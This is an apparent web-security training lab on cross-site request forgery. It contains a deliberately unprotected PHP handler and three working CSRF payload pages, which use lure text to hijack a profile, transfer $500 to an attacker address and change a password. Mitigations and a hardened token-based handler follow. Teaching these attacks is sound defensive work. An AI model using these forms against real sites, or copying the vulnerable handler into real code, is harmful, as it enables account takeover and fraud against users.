Lab 1: Basic CSRF Attack

Missing CSRF protection on sensitive actions

Difficulty: Low

Lab Overview

This lab demonstrates a basic CSRF vulnerability where sensitive actions like profile updates, money transfers, and password changes lack proper CSRF protection. An attacker can trick a user into performing these actions without their knowledge.

Objective: Create malicious HTML forms or use other techniques to perform unauthorized actions on behalf of the victim user.

Vulnerable Code
<?php
// Vulnerable: No CSRF protection (the lab's intentionally weak handler).
// Any cross-site POST carrying the victim's session cookie is accepted.
session_start();
$user_profile = $_SESSION['user_profile'] ?? [];   // current profile, loaded from the session

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update_profile'])) {
    $username = $_POST['username'] ?? $user_profile['username'];
    $email = $_POST['email'] ?? $user_profile['email'];
    // Update profile without CSRF token validation
    $_SESSION['user_profile'] = [
        'username' => $username,
        'email' => $email,
        // ... other fields
    ];
}

// Vulnerable: Money transfer without CSRF protection
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['transfer_money'])) {
    $amount = (float)($_POST['amount'] ?? 0);
    $recipient = $_POST['recipient'] ?? '';
    // Process transfer without CSRF validation (no token, no balance or amount check)
    $_SESSION['user_profile']['balance'] -= $amount;
}
User Profile (current values in the lab)

  • Username: victim_user
  • Email: victim@example.com
  • Role: user
  • Balance: $1,000.00
  • Phone: +1-555-0123
  • Address: 123 Main St, City, State

Vulnerability Details
  • Type: Cross-Site Request Forgery (CSRF)
  • Severity: High
  • Method: POST
  • Issue: Missing CSRF protection on sensitive actions
CSRF Attack Examples

Create these malicious HTML files to test CSRF:

  • profile_csrf.html - Profile update attack
  • transfer_csrf.html - Money transfer attack
  • password_csrf.html - Password change attack
CSRF Attack Payloads

1. Profile Update CSRF (profile_csrf.html):

<html>
<body>
  <h1>You won a prize! Click here to claim it!</h1>
  <form action="http://localhost/test/csrf/1.php" method="POST">
    <input type="hidden" name="update_profile" value="1">
    <input type="hidden" name="username" value="hacked_user">
    <input type="hidden" name="email" value="hacker@evil.com">
    <input type="hidden" name="phone" value="+1-555-9999">
    <input type="hidden" name="address" value="Evil Street, Hacker City">
    <input type="submit" value="Claim Prize">
  </form>
</body>
</html>

2. Money Transfer CSRF (transfer_csrf.html):

<html>
<body>
  <h1>Special offer! Get $100 bonus!</h1>
  <form action="http://localhost/test/csrf/1.php" method="POST">
    <input type="hidden" name="transfer_money" value="1">
    <input type="hidden" name="amount" value="500">
    <input type="hidden" name="recipient" value="attacker@evil.com">
    <input type="submit" value="Get Bonus">
  </form>
</body>
</html>

3. Password Change CSRF (password_csrf.html):

<html>
<body>
  <h1>Security update required!</h1>
  <form action="http://localhost/test/csrf/1.php" method="POST">
    <input type="hidden" name="change_password" value="1">
    <input type="hidden" name="new_password" value="hacked123">
    <input type="hidden" name="confirm_password" value="hacked123">
    <input type="submit" value="Update Security">
  </form>
</body>
</html>
Mitigation Strategies
  • Implement CSRF tokens for all state-changing operations
  • Use SameSite cookie attributes to prevent cross-site requests
  • Implement proper request validation and authorization checks
  • Use double-submit cookie pattern for additional protection
  • Implement proper session management and timeout
  • Regular security testing and vulnerability assessments
  • Monitor for unusual request patterns and anomalies
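The following is an added example, not the lab's own code, showing how the profile-update and money-transfer handlers above look once the first two mitigations are applied: a per-session synchronizer token checked with a constant-time comparison, plus a SameSite session cookie. The function names (csrf_token, csrf_validate) and the form markup are assumptions made for this example; the field names match the lab's handlers.

```php
<?php
// Added example (not the lab's own code): hardened versions of the lab's
// profile-update and money-transfer handlers. csrf_token() and csrf_validate()
// are names chosen for this example.

// 1. SameSite session cookie: the browser withholds the cookie on cross-site
//    POSTs, so a form hosted elsewhere never arrives with the victim's session.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,      // set to false only for a plain-http local lab
    'samesite' => 'Strict',
]);
session_start();

// 2. Synchronizer token: one unguessable value per session, embedded in every
//    state-changing form and compared on submission.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_validate($submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals is constant-time; a missing or foreign token fails here
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_validate($_POST['csrf_token'] ?? null)) {
        // Reject and log; the action is never performed
        http_response_code(403);
        error_log('CSRF token mismatch from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Invalid request token.');
    }

    $user_profile = $_SESSION['user_profile'] ?? [];

    if (isset($_POST['update_profile'])) {
        $_SESSION['user_profile'] = [
            'username' => $_POST['username'] ?? ($user_profile['username'] ?? ''),
            'email'    => $_POST['email'] ?? ($user_profile['email'] ?? ''),
            'balance'  => $user_profile['balance'] ?? 0,
        ];
    }

    if (isset($_POST['transfer_money'])) {
        $amount = (float)($_POST['amount'] ?? 0);
        // Authorization check the lab's code lacks: positive amount, sufficient balance
        if ($amount > 0 && $amount <= ($user_profile['balance'] ?? 0)) {
            $_SESSION['user_profile']['balance'] -= $amount;
        }
    }

    // Rotate the token after use so a leaked value cannot be replayed
    unset($_SESSION['csrf_token']);
    header('Location: ' . $_SERVER['REQUEST_URI']);   // redirect after POST
    exit;
}

$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="POST">
    <input type="hidden" name="csrf_token" value="<?= $token ?>">
    <input type="hidden" name="transfer_money" value="1">
    <label>Amount <input type="number" name="amount" step="0.01" min="0.01"></label>
    <label>Recipient <input type="text" name="recipient"></label>
    <button type="submit">Transfer</button>
</form>
```

With this in place the three payload pages above still submit, but the browser sends no session cookie (SameSite=Strict) and the request carries no csrf_token, so the handler returns 403 and logs the attempt before touching the session. Rotating the token after each POST limits replay of a leaked value but breaks forms left open in a second tab; a per-session token that is not rotated is the usual trade-off when that matters.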